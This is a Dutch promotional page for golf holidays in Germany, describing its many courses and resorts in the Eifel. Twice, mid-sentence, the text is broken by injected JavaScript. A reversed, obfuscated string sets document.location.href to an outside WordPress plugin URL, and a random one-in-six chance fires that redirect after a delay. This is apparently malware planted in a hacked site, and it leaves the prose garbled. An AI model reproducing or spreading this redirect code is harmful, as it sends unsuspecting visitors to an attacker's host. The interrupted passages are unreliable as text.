Golfvakantie’s , golfreizen Duitsland

Duitsland is om logische reden nog steeds ons meest bezochte buitenland voor golfers.

Zij weten dat de Duitse golfbanen meestal mooi zijn aangelegd, vrij dichtbij liggen en vaak niet zo duur zijn. Met een paar uur rijden zit u in Duitsland en staan er legio golfbanen ter beschikking. Ook als je van verder komt is golfen in Duitsland het overwegen waard.
Meer dan 900 golfbanen zijn er in Duitsland te vinden. De een nog mooier dan de ander. De ligging van de banen is zeer divers. Parkland, bosbanen, berg- en heuvelachtig en in het noorden aan de kust zijn ook wat linksbanen te vinden. Golfreizenanders heeft al enkele jaren een aantal prachtige en gezellige locatie’s die overigens alle toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}door Nederlanders worden beheerd voor een warm onthaal in uw eigen taal! Een uitstekende gelegenheid voor uw golfvakantie in Duitsland.

Een mooie baan om te bespelen is Golfresort Bitburgerland in de Zuid-Eifel. De baan is prachtig ingepast in het bergachtige landschap. Wat noordelijker in de Eifel in Hillesheim, ligt Golfclub Eifel. Ook deze baan is mooi in het karakteristieke Eifellandschap geïntegreerd.
Met 900 banen voor het uitkiezen, heeft de golfer in Duitsland het niet slecht. In elke deelstaat zijn er legio mogelijkheden.

Ga op onderzoek uit en klik hier voor een schitterende golfvakantie in Duitsland.

Indien u nog meer informatie wenst kunt u dat toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doen via het contactformulier of u kunt bellen.